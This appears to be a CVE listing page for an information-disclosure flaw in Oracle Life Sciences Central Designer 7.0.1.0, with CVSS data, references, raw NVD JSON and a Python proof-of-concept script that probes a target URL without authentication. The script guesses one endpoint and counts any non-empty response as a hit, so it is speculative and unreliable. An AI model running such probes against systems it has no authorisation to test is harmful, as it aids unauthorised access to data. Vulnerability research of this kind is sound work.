CVE-2026-21974

Description

Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:life_sciences_central_designer:7.0.1.0:*:*:*:*:*:*:* - VULNERABLE

Oracle Life Sciences Central Designer 7.0.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21974 PoC - Oracle Life Sciences Central Designer Information Disclosure
# Target: Oracle Life Sciences Central Designer 7.0.1.0
# Vulnerability: Unauthenticated information disclosure via HTTP

import requests
import sys

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2026-21974
    """
    # Common endpoints that might expose sensitive information
    endpoints = [
        "/ords/f"
    ]
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "application/json, text/html",
        "Connection": "close"
    }
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2026-21974 PoC")
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f"\n[*] Testing endpoint: {url}")
        
        try:
            # Attempt to access potentially sensitive endpoints without authentication
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response Length: {len(response.text)}")
            
            # Check for indicators of successful information disclosure
            if response.status_code == 200:
                if len(response.text) > 0:
                    print(f"[!] Potential vulnerability detected - Unexpected data returned")
                    print(f"[+] Sample response (first 500 chars):\n{response.text[:500]}")
                    return True
            
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    print("\n[*] Testing complete")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-21974-poc.py <target_url>")
        print("Example: python cve-2026-21974-poc.py https://target.example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21974
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21974
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21974/
[4] VulDB https://vuldb.com/cve/CVE-2026-21974
[5] https://www.oracle.com/security-alerts/cpujan2026.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21974", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:00.587", "lastModified": "2026-01-29T14:47:09.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Life Sciences Central Designer de Oracle Health Sciences Applications (componente: Platform). La versión compatible que está afectada es la 7.0.1.0. Una vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso de red vía HTTP comprometer Oracle Life Sciences Central Designer. Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle Life Sciences Central Designer. Puntuación Base CVSS 3.1 de 5.3 (Impactos en la Confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:life_sciences_central_designer:7.0.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FD42C36C-1BB2-4A80-B997-1F9C1861D7A0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}